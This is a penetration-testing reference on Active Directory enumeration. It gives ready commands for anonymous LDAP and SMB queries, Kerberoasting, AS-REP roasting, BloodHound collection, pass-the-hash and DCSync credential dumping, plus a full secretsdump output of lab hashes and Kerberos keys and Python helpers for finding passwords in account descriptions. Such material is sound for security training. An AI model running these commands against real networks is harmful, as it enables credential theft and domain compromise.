This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Active Directory Enumeration

Non-Authenticated (External) Enumeration

DNS Reconnaissance

Reverse DNS + PTR Records

Reverse lookups across the target range return PTR records, whose hostnames often give away DCs and other AD services by name (dc01, ad, ldap, exchange). This only works where PTR records exist: reverse zones are not created automatically when a domain is set up, so an empty result does not mean the range is empty.

dnsrecon -r <ip-range> -n <dc-ip or dns-server>

SRV Record Discovery

AD registers an SRV record for every service a domain controller offers (_ldap, _kerberos, _kpasswd, _gc, and the _msdcs sub-tree, e.g. _ldap._tcp.dc._msdcs.<domain> for the list of DCs), so these records show which hosts are domain controllers, which are global catalogs, and which ports they listen on.

No domain credentials are needed: an SRV lookup is an ordinary DNS query. It does have to reach a DNS server that hosts the AD zone (normally a DC itself, which is why -n points at it); public resolvers do not carry these records, so from outside the network this only works when the internal DNS zone or a DC is exposed.

dnsrecon -d <domain> -t srv -n <dc-ip or dns-server>

Example output:

This table explains each field of a dnsrecon SRV result line:

Record Type                  | Example Value                | Description
-----------------------------|------------------------------|-------------------------------------------------------------------------------
Service Name                 | _kerberos                    | The protocol/service being advertised (Kerberos, LDAP, etc.).
Transport Protocol           | _tcp / _udp                  | Transport protocol used by the service (usually TCP or UDP).
FQDN (Query Target)          | hackme.local                 | The DNS zone/domain for which the SRV record was queried.
Hostname of Service Provider | win-r0buvkrgbid.hackme.local | The actual hostname providing the service (a domain controller, for example).
IP Address of Hostname       | 192.168.100.154              | The IP address of the hostname providing the service.
Service Port                 | 88, 389, 464, 3268           | Port the service listens on (88 Kerberos, 389 LDAP, 464 kpasswd, 3268 global catalog).
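The fields above are easiest to use once the lines are grouped per host: a host that advertises both _kerberos and _ldap is a domain controller, and _gc on 3268 marks a global catalog. The following Python is an added example, not part of the original page or of dnsrecon; the sample lines are constructed in dnsrecon's "SRV <name> <target> <ip> <port>" layout (the first host mirrors the table, dc02 is made up for contrast), and srv_names() lists the standard AD SRV names to query by hand with dig or nslookup when dnsrecon is not available.

```python
import re
from collections import defaultdict

# Constructed sample in the "SRV <name> <target> <ip> <port>" layout dnsrecon
# prints; the first host mirrors the table above, dc02 is made up for contrast.
SAMPLE_SRV_OUTPUT = """\
[*]      SRV _kerberos._tcp.hackme.local win-r0buvkrgbid.hackme.local 192.168.100.154 88
[*]      SRV _kerberos._udp.hackme.local win-r0buvkrgbid.hackme.local 192.168.100.154 88
[*]      SRV _ldap._tcp.hackme.local win-r0buvkrgbid.hackme.local 192.168.100.154 389
[*]      SRV _ldap._tcp.dc._msdcs.hackme.local win-r0buvkrgbid.hackme.local 192.168.100.154 389
[*]      SRV _gc._tcp.hackme.local win-r0buvkrgbid.hackme.local 192.168.100.154 3268
[*]      SRV _kpasswd._tcp.hackme.local win-r0buvkrgbid.hackme.local 192.168.100.154 464
[*]      SRV _kerberos._tcp.hackme.local dc02.hackme.local 192.168.100.155 88
[*]      SRV _ldap._tcp.hackme.local dc02.hackme.local 192.168.100.155 389
"""

SRV_LINE = re.compile(r"SRV\s+(?P<name>\S+)\s+(?P<host>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)")


def srv_names(domain):
    """SRV names AD registers for a domain; query them directly with
    e.g. `dig @<dc-ip> SRV _ldap._tcp.dc._msdcs.<domain>` if dnsrecon is absent."""
    return [
        f"_ldap._tcp.dc._msdcs.{domain}",   # every domain controller
        f"_ldap._tcp.pdc._msdcs.{domain}",  # the PDC emulator
        f"_gc._tcp.{domain}",               # global catalog servers
        f"_kerberos._tcp.{domain}",         # KDCs
        f"_kpasswd._tcp.{domain}",          # Kerberos password-change service
    ]


def parse_srv(text):
    """Split each result line into service, transport, zone, host, ip and port."""
    records = []
    for line in text.splitlines():
        m = SRV_LINE.search(line)
        if not m:
            continue
        # "_ldap._tcp.dc._msdcs.hackme.local" -> "_ldap", "_tcp", "dc._msdcs.hackme.local"
        service, transport, zone = m["name"].split(".", 2)
        records.append({
            "service": service, "transport": transport, "zone": zone,
            "host": m["host"].lower(), "ip": m["ip"], "port": int(m["port"]),
        })
    return records


def classify_hosts(records):
    """Group records per host and derive roles: Kerberos + LDAP on the same
    host means a domain controller, _gc marks a global catalog."""
    by_host = defaultdict(lambda: {"ip": None, "services": set(), "ports": set()})
    for r in records:
        entry = by_host[r["host"]]
        entry["ip"] = r["ip"]
        entry["services"].add(r["service"])
        entry["ports"].add(r["port"])
    result = {}
    for host, entry in by_host.items():
        roles = set()
        if "_kerberos" in entry["services"]:
            roles.add("KDC")
        if "_ldap" in entry["services"]:
            roles.add("LDAP")
        if roles >= {"KDC", "LDAP"}:
            roles.add("DC")
        if "_gc" in entry["services"]:
            roles.add("GC")
        result[host] = {"ip": entry["ip"], "roles": sorted(roles), "ports": sorted(entry["ports"])}
    return result


if __name__ == "__main__":
    for host, info in classify_hosts(parse_srv(SAMPLE_SRV_OUTPUT)).items():
        print(f"{host:32} {info['ip']:16} {','.join(info['roles']):16} ports={info['ports']}")
```

Run it against real dnsrecon output by piping the tool's stdout into parse_srv; hosts that show LDAP without Kerberos are worth a second look, since a plain LDAP server registered in the AD zone is not a DC.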

LDAP Enumeration

LDAP Anonymous Binding

Purpose: Extract directory information when anonymous access is permitted. A domain controller answers anonymous rootDSE queries (naming contexts, supported controls) by default, but refuses anonymous reads of domain objects unless the forest's dSHeuristics attribute has its seventh character set to 2; the first two queries below therefore almost always succeed, while the rest only work on misconfigured domains.

Anonymous LDAP Queries

# Test anonymous binding capabilities (rootDSE, readable anonymously on most DCs)
ldapsearch -x -H ldap://<DC-IP> -s base -b "" namingcontexts
ldapsearch -x -H ldap://<DC-IP> -s base -b "" defaultnamingcontext

# Extract base domain information (fails unless anonymous object access is enabled)
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" -s base "(objectClass=*)"

# Anonymous user enumeration (objectCategory=person excludes computer accounts, which are also objectClass=user)
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(&(objectCategory=person)(objectClass=user))" sAMAccountName description
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=person)" cn mail

# Anonymous group enumeration
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=group)" sAMAccountName member

Requirements: LDAP server configured to allow anonymous reads. For AD this means dSHeuristics with its seventh character set to 2 (the rootDSE queries work regardless); on OpenLDAP or other directories it is the server's own anonymous-bind setting.

Use Case: Legacy environments, misconfigured LDAP servers, or intentionally open directories
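ldapsearch prints LDIF, and two LDIF rules routinely hide the interesting bits from a grep: a line starting with a single space continues the previous attribute, and an attribute written with "::" is base64 (AD returns descriptions with non-ASCII characters that way). The following Python is an added example, not part of the original page or of any tool; the LDIF it parses is constructed to contain both cases plus a description holding a password, and the sample values are invented.

```python
import base64
import re

# Constructed ldapsearch-style output (not real directory data). It contains
# a folded line (continuation starts with one space) and a base64 value
# ("description::"), both of which a plain grep for "pass" would miss.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=hackme,DC=local> with scope subtree
# filter: (&(objectCategory=person)(objectClass=user))
# requesting: sAMAccountName description

# sql-svc, Users, hackme.local
dn: CN=sql-svc,CN=Users,DC=hackme,DC=local
sAMAccountName: sql-svc
description: SQL service account, temp pass
 word is Winter2024!

# ra2fat, Users, hackme.local
dn: CN=ra2fat,CN=Users,DC=hackme,DC=local
sAMAccountName: ra2fat
description:: SGVscGRlc2sgdXNlcg==

# 7amoodeh, Users, hackme.local
dn: CN=7amoodeh,CN=Users,DC=hackme,DC=local
sAMAccountName: 7amoodeh

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
"""

ATTR_LINE = re.compile(r"^(?P<name>[A-Za-z][\w.;-]*)(?P<sep>::?) ?(?P<value>.*)$")
CRED_HINT = re.compile(r"pass|pwd|cred|secret|login", re.IGNORECASE)


def unfold(text):
    """Join LDIF continuation lines (leading single space) onto the line above."""
    lines = []
    for line in text.splitlines():
        if line.startswith(" ") and lines:
            lines[-1] += line[1:]
        else:
            lines.append(line)
    return lines


def parse_ldif(text):
    """Return one dict per entry; each attribute maps to a list of values and
    base64 values ("attr:: ...") are decoded. Blocks without a dn (the trailing
    search/result summary) are dropped."""
    entries, current = [], {}
    for line in unfold(text):
        if line.startswith("#"):
            continue
        if not line.strip():
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue
        value = m["value"]
        if m["sep"] == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(m["name"], []).append(value)
    if "dn" in current:
        entries.append(current)
    return entries


def find_credential_hints(entries):
    """Accounts whose description looks like it carries a password or a hint."""
    hits = []
    for e in entries:
        for desc in e.get("description", []):
            if CRED_HINT.search(desc):
                hits.append((e["sAMAccountName"][0], desc))
    return hits


if __name__ == "__main__":
    for name, desc in find_credential_hints(parse_ldif(SAMPLE_LDIF)):
        print(f"{name}: {desc}")
```

The same parser works on the authenticated ldapsearch output later in this guide; widen CRED_HINT to whatever wording the target organisation uses once you have seen a few descriptions.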

Automated Anonymous LDAP Extraction

# Complete anonymous domain dump (no -u/-p: ldapdomaindump binds anonymously when no user is given)
ldapdomaindump <DC-IP>

# Alternative: enum4linux collects the same user and group lists over SMB/RPC null sessions rather than LDAP
enum4linux -a <DC-IP>

Requirements: Anonymous LDAP access enabled

Use Case: When organizations maintain legacy compatibility or have misconfigured LDAP security

SMB/NetBIOS Enumeration

Purpose: Leverage SMB null sessions and NetBIOS for domain reconnaissance.

SMB Null Session Enumeration

# Basic SMB enumeration
smbclient -L //<DC-IP> -N
smbmap -H <DC-IP> -u '' -p ''

# RPC null session exploitation
rpcclient -U "" -N <DC-IP>
rpcclient> enumdomusers
rpcclient> enumdomgroups
rpcclient> querydominfo
rpcclient> querydispinfo
rpcclient> enumdomains

Requirements: Target allows null sessions (RestrictAnonymous = 0; listing users additionally needs RestrictAnonymousSAM = 0, i.e. "Do not allow anonymous enumeration of SAM accounts" disabled). Windows Server 2008 and later block this by default, so the null bind itself may succeed while enumdomusers returns NT_STATUS_ACCESS_DENIED.

Use Case: Windows 2000/2003 environments or systems with legacy compatibility settings

NetBIOS Information Gathering

# NetBIOS name resolution
nbtscan 192.168.1.0/24
nmblookup -A <target-IP>

# NetBIOS enumeration
enum4linux -n <DC-IP>
nmap -sU -p 137 --script nbstat <network-range>

Requirements: NetBIOS over TCP/IP enabled and UDP 137 reachable from your position; the queries are sent to each host individually, so the range must be routable and the port unfiltered.

Use Case: Internal network enumeration, legacy Windows environments


Authenticated (Post-Compromise) Enumeration

Domain Mapping

Purpose: Extract AD objects and relationships for attack planning.

LDAP Domain Dump

Requirements: Valid domain credentials (user account)

Use Case: Post-credential compromise, domain mapping for attack planning

# Complete authenticated domain extraction
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP>

# Pass-the-hash: -p also accepts an LM:NT hash pair (use the empty LM hash when you only have the NT hash)
ldapdomaindump -u '<domain>\<username>' -p 'aad3b435b51404eeaad3b435b51404ee:<NTLM-hash>' <DC-IP>

Credential Extraction

Purpose: Harvest authentication material for lateral movement and privilege escalation.

Requirements: Local administrator on the target (SAM, LSA secrets and cached logons are read through the remote registry) or, against a domain controller, the DCSync rights "Replicating Directory Changes" and "Replicating Directory Changes All", which Domain Admins hold by default. The output below shows both paths in one run: the registry-based SAM/LSA dump followed by NTDS.dit secrets pulled via DRSUAPI.

Use Case: When you have admin access to systems or specific privileges like "Replicating Directory Changes". With replication rights only, add -just-dc (or -just-dc-ntlm) so secretsdump skips the registry reads that need local admin.

NTDS.dit and Registry Hive Extraction

# Complete credential dump from domain controller
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP>
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP>

Example output:

Impacket v0.13.0.dev0+20250728.93925.b5302a84 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xd01d352a7b37e42791250a0ec4c4baa3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HACKME\WIN-R0BUVKRGBID$:aes256-cts-hmac-sha1-96:c0ccd9f1abf0f8ba60d302f0ecb193ba3801e4c4247332a585a1674f7b867a4a
HACKME\WIN-R0BUVKRGBID$:aes128-cts-hmac-sha1-96:9f7c71c1118f61fa9114c5101424418b
HACKME\WIN-R0BUVKRGBID$:des-cbc-md5:0eba0273bad6cddc
HACKME\WIN-R0BUVKRGBID$:plain_password_hex:13e281e55dc8d980092c231b7fee2200cfded5eb024fa4d177ee6c1c0e428bee9ae2797e50cf651bdde3002cd487f660672ea5118c4409593e9c4b1b8e1256b14b2bf9be84a84bfc54b72a1aaa2fff6f90b20d5374f770f7b43e57964c7730ce154bcc291fb9a5da7f5aace24a64aa0a43499b6ab06cf71442b2be0e5ca68d50b647edb16736034e46efde3e5b2126613912c08068525f59778a2a531464347a56d2fa055bd9d1740f13a4522848f6d94d59721c0e7fae6a7e6597066b00cb52407f3555ebb9154a0415a30a377dbc2fdf4e22f5a7104aed183e71954339d61224cfa598935ae952cf3660eac4116d0f
HACKME\WIN-R0BUVKRGBID$:aad3b435b51404eeaad3b435b51404ee:53301a3a3669d99ddc0ecfaa7cf43e7a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe5639817fd3ce0a5fc8d379c16f99fa6c830b85a
dpapi_userkey:0x5c8986c14d00d9457788fb334fc2a92d4d7acbc2
[*] NL$KM 
 0000   DD D5 F3 D0 EA 3E 3F 1B  34 70 72 E6 34 9B 62 78   .....>?.4pr.4.bx
 0010   CF 54 72 CA F4 86 45 A4  0A D0 DF 3F 2B 1E 2E E9   .Tr...E....?+...
 0020   33 65 9A 31 59 2A 57 27  7D 37 E7 ED 5C 6C 28 11   3e.1Y*W'}7..\l(.
 0030   24 92 C6 99 1B 0C 85 2F  70 9B 48 A2 8B 39 EA DF   $....../p.H..9..
NL$KM:ddd5f3d0ea3e3f1b347072e6349b6278cf5472caf48645a40ad0df3f2b1e2ee933659a31592a57277d37e7ed5c6c28112492c6991b0c852f709b48a28b39eadf
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:241ebf5d671f670e63a3a12fd332fd1a:::
hackme.local\sql-svc:1103:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
hackme.local\7amoodeh:1104:aad3b435b51404eeaad3b435b51404ee:ba17e001e5467d85d16ae7247947929c:::
hackme.local\ra2fat:1105:aad3b435b51404eeaad3b435b51404ee:ba17e001e5467d85d16ae7247947929c:::
WIN-R0BUVKRGBID$:1000:aad3b435b51404eeaad3b435b51404ee:53301a3a3669d99ddc0ecfaa7cf43e7a:::
DESKTOP-4CJ1O3A$:1106:aad3b435b51404eeaad3b435b51404ee:fa92e5f8eb7ace3562e5711a869ffc59:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:eda01d9820ff8288900a83674eec768856d66f53ac19b244c9208376ebe5c484
Administrator:aes128-cts-hmac-sha1-96:48c2d624819f9c36281ff52aed35ce32
Administrator:des-cbc-md5:45838a9468a7d626
krbtgt:aes256-cts-hmac-sha1-96:2263f262b93c5c4969e7c1409ff6474a23bd3d1462a94a3b6cac52cd61e5a9d0
krbtgt:aes128-cts-hmac-sha1-96:c0dcf5e606ea8bb22f0608289ccab1bd
krbtgt:des-cbc-md5:9d6eb58fd9e6a208
hackme.local\sql-svc:aes256-cts-hmac-sha1-96:2c54eafc466fbd3f2d4d205b823b4784a00cb9e05d5922de9351c7b51fd198e9
hackme.local\sql-svc:aes128-cts-hmac-sha1-96:630dca436f714c2fe0522b226405fdc5
hackme.local\sql-svc:des-cbc-md5:5b9b342f459868c1
hackme.local\7amoodeh:aes256-cts-hmac-sha1-96:bab49f211d57e7fe609012db29f9f4b61f22bf5029716c888bd8ac7c8a527e6e
hackme.local\7amoodeh:aes128-cts-hmac-sha1-96:19318dc18b9d36107c346e339b7407d5
hackme.local\7amoodeh:des-cbc-md5:62c723379bfbaedc
hackme.local\ra2fat:aes256-cts-hmac-sha1-96:da91b33ef480372970d1260fb28adfba8a9e90a3aa7546bf16c8b8c86ae46554
hackme.local\ra2fat:aes128-cts-hmac-sha1-96:4bf2db5302b776eaa25e08af4debcbaf
hackme.local\ra2fat:des-cbc-md5:91fb8cf19ba8868f
WIN-R0BUVKRGBID$:aes256-cts-hmac-sha1-96:c0ccd9f1abf0f8ba60d302f0ecb193ba3801e4c4247332a585a1674f7b867a4a
WIN-R0BUVKRGBID$:aes128-cts-hmac-sha1-96:9f7c71c1118f61fa9114c5101424418b
WIN-R0BUVKRGBID$:des-cbc-md5:23465825ae6b383b
DESKTOP-4CJ1O3A$:aes256-cts-hmac-sha1-96:a558cfe8d560b89df823e1319a6f0554641f084e69ca4e82d742130fee58c4e9
DESKTOP-4CJ1O3A$:aes128-cts-hmac-sha1-96:1ecca604d68ae2a7478b1161d158daef
DESKTOP-4CJ1O3A$:des-cbc-md5:311adab07a326197
[*] Cleaning up...

Service Account Discovery

Purpose: Identify service accounts for Kerberoasting and AS-REP roasting attacks.

Kerberoasting Enumeration

Requirements: Valid domain user credentials; any authenticated domain principal may request a service ticket for any SPN, so no special rights are needed.

Use Case: Always applicable with domain credentials. Service accounts with SPNs are common targets because the service ticket is encrypted with a key derived from the account's password and can be cracked offline. Add -request (and -outputfile <file>) to have GetUserSPNs.py request the tickets rather than only list the SPNs; tickets returned with RC4 (etype 23) crack far faster than AES ones.

# SPN enumeration
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP>

Example output:

AS-REP Roasting

Requirements: Domain user credentials, or only a list of candidate usernames for the unauthenticated form.

Use Case: When accounts have "Do not require Kerberos preauthentication" set (userAccountControl bit 0x400000). The unauthenticated -usersfile form doubles as user enumeration, because the KDC answers differently for unknown principals than for existing ones that do require pre-authentication. With credentials, add -request -format hashcat to obtain crackable AS-REP hashes instead of just the list.

# Find accounts without pre-authentication
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass
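Both Kerberoasting and AS-REP roasting come down to LDAP filters over userAccountControl and servicePrincipalName, and knowing the filters lets you reproduce the tools' selection with plain ldapsearch or spot why an account was skipped (disabled accounts roast to nothing, and DCs always carry TRUSTED_FOR_DELEGATION). The following Python is an added example, not part of the original page or of Impacket: it decodes userAccountControl bits, builds the filters the two sections above rely on, and applies the same conditions locally to constructed attribute values (the account names are reused from the dump above, their flags and SPNs are invented).

```python
# Bitwise-AND matching rule used in AD LDAP filters on flag attributes.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# userAccountControl bits that matter for enumeration (MS-ADTS / MS-SAMR values).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",            # set on domain controllers
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",         # unconstrained delegation
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",              # AS-REP roastable
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
}
NAME_TO_BIT = {name: bit for bit, name in UAC_FLAGS.items()}

# Constructed accounts (names from the dump above, flags and SPNs invented).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "sql-svc", "objectCategory": "person", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.hackme.local:1433"]},
    {"sAMAccountName": "7amoodeh", "objectCategory": "person", "userAccountControl": 0x410200},
    {"sAMAccountName": "ra2fat", "objectCategory": "person", "userAccountControl": 0x400202},
    {"sAMAccountName": "krbtgt", "objectCategory": "person", "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "svc-backup", "objectCategory": "person", "userAccountControl": 0x80200},
    {"sAMAccountName": "WIN-R0BUVKRGBID$", "objectCategory": "computer", "userAccountControl": 0x82000,
     "servicePrincipalName": ["ldap/win-r0buvkrgbid.hackme.local"]},
]


def decode_uac(value):
    """Flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def uac_is(flag, present=True):
    """LDAP clause testing one userAccountControl bit, optionally negated."""
    clause = "(userAccountControl:%s:=%d)" % (LDAP_MATCHING_RULE_BIT_AND, NAME_TO_BIT[flag])
    return clause if present else "(!%s)" % clause


def asrep_roast_filter():
    """Enabled user accounts that do not require Kerberos pre-authentication."""
    return ("(&(objectCategory=person)(objectClass=user)"
            + uac_is("DONT_REQ_PREAUTH") + uac_is("ACCOUNTDISABLE", False) + ")")


def kerberoast_filter():
    """Enabled user accounts with an SPN; krbtgt is excluded as its ticket is
    the TGT itself and its password is not crackable in practice."""
    return ("(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)"
            "(!(sAMAccountName=krbtgt))" + uac_is("ACCOUNTDISABLE", False) + ")")


def unconstrained_delegation_filter():
    """Objects trusted for unconstrained delegation, minus DCs, which always are."""
    return "(&" + uac_is("TRUSTED_FOR_DELEGATION") + uac_is("SERVER_TRUST_ACCOUNT", False) + ")"


def triage(accounts):
    """Evaluate the same conditions locally on parsed attribute values."""
    out = {"asrep": [], "kerberoast": [], "unconstrained": [], "passwd_notreqd": []}
    for a in accounts:
        uac, name = a["userAccountControl"], a["sAMAccountName"]
        enabled = not uac & NAME_TO_BIT["ACCOUNTDISABLE"]
        is_person = a.get("objectCategory") == "person"
        if is_person and enabled and uac & NAME_TO_BIT["DONT_REQ_PREAUTH"]:
            out["asrep"].append(name)
        if is_person and enabled and a.get("servicePrincipalName") and name != "krbtgt":
            out["kerberoast"].append(name)
        if uac & NAME_TO_BIT["TRUSTED_FOR_DELEGATION"] and not uac & NAME_TO_BIT["SERVER_TRUST_ACCOUNT"]:
            out["unconstrained"].append(name)
        if enabled and uac & NAME_TO_BIT["PASSWD_NOTREQD"]:
            out["passwd_notreqd"].append(name)
    return out


if __name__ == "__main__":
    print(asrep_roast_filter())
    print(kerberoast_filter())
    for a in SAMPLE_ACCOUNTS:
        print(a["sAMAccountName"], decode_uac(a["userAccountControl"]))
    print(triage(SAMPLE_ACCOUNTS))
```

The filters go straight into ldapsearch (ldapsearch -x -H ldap://<DC-IP> -D '<user>@<domain>' -W -b "DC=domain,DC=com" "$(python3 uac.py | head -1)" sAMAccountName), and the triage output is what to compare against what GetUserSPNs.py and GetNPUsers.py return. ra2fat in the sample has pre-authentication disabled but is itself disabled, which is why it is not AS-REP roastable.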

Privilege Escalation Path Discovery

Purpose: Map AD relationships for privilege escalation opportunities.

BloodHound Data Collection

Requirements: Domain user credentials, network access to domain controllers and, for -c all, to every domain-joined host, since session and local-group collection query each computer over SMB/RPC. Use -c DCOnly when you cannot or should not touch member machines; it collects everything that can be read from LDAP alone.

Use Case: Mapping complex privilege relationships, planning privilege escalation paths

# Comprehensive collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all
bloodhound-python -u <username> -p <password> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all --zip
bloodhound-python --hashes :<NTLM-hash> -u <username> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all

Multi-Protocol Information Gathering

Purpose: Leverage multiple protocols for comprehensive enumeration.

CrackMapExec Enumeration

# SMB-based enumeration
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --shares
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --sessions
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --disks

# LDAP-based enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --admin-count
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --trusted-for-delegation
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --password-not-required

# Roasting helpers (both --kerberoasting and --asreproast take an output file for the collected hashes)
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --kerberoasting kerberoast.txt
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --asreproast asreproast.txt
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --gmsa

# Network-wide enumeration
crackmapexec smb 192.168.1.0/24 -u '<username>' -p '<password>' --shares
crackmapexec ldap 192.168.1.0/24 -u '<username>' -p '<password>' --users

Requirements: Valid domain credentials, network access to targets. CrackMapExec is no longer maintained; its fork NetExec (nxc) keeps the same syntax, so the commands above work with crackmapexec replaced by nxc.

Use Case: Network-wide enumeration, multi-protocol correlation, bulk operations

Password Policy and Account Lockout Analysis

# Extract password policies
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --pass-pol

# Fine-grained password policy enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --fgpp

Requirements: Domain user credentials

Use Case: Planning password attacks and understanding lockout thresholds. Read the domain policy together with any fine-grained password policies (PSOs): a PSO applied to a user or to one of their groups overrides the domain policy, the PSO with the lowest precedence value winning, so a service account or an admin group may have a different lockout threshold than the domain-wide figure suggests.

Security Identifier (SID) Analysis

Purpose: Enumerate accounts and groups by brute-forcing RIDs. lookupsid obtains the domain SID and then asks the DC to resolve every S-<domain SID>-<RID> in a range through LsarLookupSids (MS-LSAT), which often still answers over a null or guest session when SAMR user enumeration is denied.

Comprehensive SID Enumeration

# Basic SID enumeration
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP>
python3 lookupsid.py guest@<DC-IP>

# Custom RID ceiling (the optional positional argument is the highest RID to try; the default is 4000)
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 2000
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 20000

# Highest RID found (RIDs are allocated sequentially, so this approximates how many objects the domain has ever created)
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> | tail -1

Requirements: Valid credentials or guest access, RPC access to domain controllers

Use Case: Discovering hidden accounts, service accounts, and non-standard objects
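What lookupsid brute-forces is the RID suffix of the domain SID, and the same SID structure turns up elsewhere in enumeration: ldapsearch prints objectSid as base64 binary, and well-known RIDs identify privileged groups regardless of how they were renamed. The following Python is an added example, not part of the original page or of Impacket; it converts between string and binary SIDs, decodes the base64 form ldapsearch emits, labels well-known RIDs, and generates the candidate SIDs for a RID range. The domain SID used in the demo is made up.

```python
import base64
import struct

# Well-known relative IDs; everything >= 1000 comes from the RID pool.
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers", 517: "Cert Publishers",
    518: "Schema Admins", 519: "Enterprise Admins",
    520: "Group Policy Creator Owners", 525: "Protected Users",
}


def sid_to_bytes(sid):
    """String SID -> binary form stored in objectSid: revision (1 byte),
    sub-authority count (1 byte), 48-bit big-endian identifier authority,
    then each sub-authority as a 32-bit little-endian integer."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data):
    """Binary objectSid -> string SID."""
    revision, count = data[0], data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def sid_to_b64(sid):
    """The form ldapsearch prints: objectSid:: <base64>."""
    return base64.b64encode(sid_to_bytes(sid)).decode()


def decode_ldif_sid(b64):
    return bytes_to_sid(base64.b64decode(b64))


def split_sid(sid):
    """Domain SID and RID of an account or group SID."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def describe_rid(rid):
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    return "well-known/builtin" if rid < 1000 else "pool-allocated object"


def rid_range(domain_sid, start, stop):
    """Candidate SIDs for a RID range, as lookupsid hands them to LsarLookupSids."""
    return ["%s-%d" % (domain_sid, rid) for rid in range(start, stop + 1)]


if __name__ == "__main__":
    # Constructed domain SID; the RID 1103 matches sql-svc in the dump above.
    sid = "S-1-5-21-1004336348-1177238915-682003330-1103"
    b64 = sid_to_b64(sid)
    print("objectSid::", b64)
    print("decoded   :", decode_ldif_sid(b64))
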